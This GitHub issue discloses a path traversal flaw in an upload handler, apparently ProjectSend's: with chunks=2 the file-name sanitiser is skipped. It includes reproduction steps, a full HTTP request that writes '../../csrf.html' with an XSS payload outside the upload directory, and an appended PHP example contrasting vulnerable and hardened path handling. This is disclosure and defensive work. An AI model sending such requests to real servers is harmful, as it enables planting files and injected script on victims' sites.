Path traversal in Upload file function #993

Closed
@KietNA-68

Dear @ignacionelson,
I found a Path traversal vulnerability on your application!

Description

Because the if clause does not check the chunks parameter when chunks >= 2, a user with the Uploader role can add value 2 for the chunks param to bypass the fileName sanitizer.

  • In Step 1: there are 3 parameters that I can control when using the upload function: chunk, chunks, fileName

  • In Step 2: the if clause checks whether the chunks parameter is < 2; if so, the fileName parameter will be handled. So I add value 2 for the chunks param, then it will pass Step 2 and go to Step 3

If I don't add a value for chunk, then the chunk parameter goes to 0, and if I add value 2 for the chunks parameter, I can pass this if.

Step To Reproduce

  1. Use Burp Suite to capture the upload request
  2. Change the value of the chunks parameter to 2 and add dot dot to the name parameter to escape the root directory
  3. The file was uploaded to the webroot directory with the name index.html.part

Request:

POST /includes/upload.process.php HTTP/1.1
Host: 172.16.0.12:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4677942761162401681381669887
Content-Length: 2817
Origin: http://172.16.0.12:4444
Connection: close
Referer: http://172.16.0.12:4444/upload.php
Cookie: PHPSESSID=7simdbjnrvdjpeq6bkvfukrdvt;

-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="name"

../../csrf.html
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="chunks"

2
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<img src=x onerror=alert(1);>

-----------------------------4677942761162401681381669887--

Solutions:

Add an if clause to check when the chunks parameter is >= 2
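
The fix suggested above, sketched as an added example (not ProjectSend's code and not part of the report): clean the client-supplied name regardless of the chunks value, then confirm the resulting path still sits inside the upload directory. The function names, the sanitising regex and the demo directory are assumptions made for illustration.

```php
<?php
// Added illustration with hypothetical helper names; not ProjectSend's code.

// Pattern described in the report: the name is only cleaned on the
// non-chunked path, so chunks >= 2 leaves "../" sequences untouched.
function target_path_weak(string $uploadDir, string $rawName, int $chunks): string
{
    $fileName = $rawName;
    if ($chunks < 2) {
        $fileName = preg_replace('/[^\w.]+/', '_', basename($fileName));
    }
    return $uploadDir . DIRECTORY_SEPARATOR . $fileName . '.part';
}

// Hardened form: sanitising does not depend on chunk or chunks at all.
function target_path_safe(string $uploadDir, string $rawName): string
{
    $base = realpath($uploadDir);
    if ($base === false) {
        throw new RuntimeException('upload directory does not exist');
    }
    // Normalise separators so basename() also strips Windows-style prefixes.
    $name = basename(str_replace('\\', '/', $rawName));
    $name = preg_replace('/[^\w.]+/', '_', $name);
    $name = ltrim($name, '.'); // rejects ".", ".." and dotfiles
    if ($name === '') {
        throw new InvalidArgumentException('empty file name after sanitising');
    }
    $target = $base . DIRECTORY_SEPARATOR . $name . '.part';
    // Defence in depth: the parent of the target must be the upload dir.
    if (dirname($target) !== $base) {
        throw new RuntimeException('target escapes upload directory');
    }
    return $target;
}

// Constructed input mirroring the "name" field of the request in the report.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'upload_demo';
if (!is_dir($dir)) {
    mkdir($dir);
}
foreach ([1, 2] as $chunks) {
    printf("chunks=%d weak=%s\n", $chunks, target_path_weak($dir, '../../csrf.html', $chunks));
    printf("chunks=%d safe=%s\n", $chunks, target_path_safe($dir, '../../csrf.html'));
}
```

With chunks=2 the weak helper returns a path that still contains the `../../` prefix, while the hardened helper returns the same in-directory path for every chunks value.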
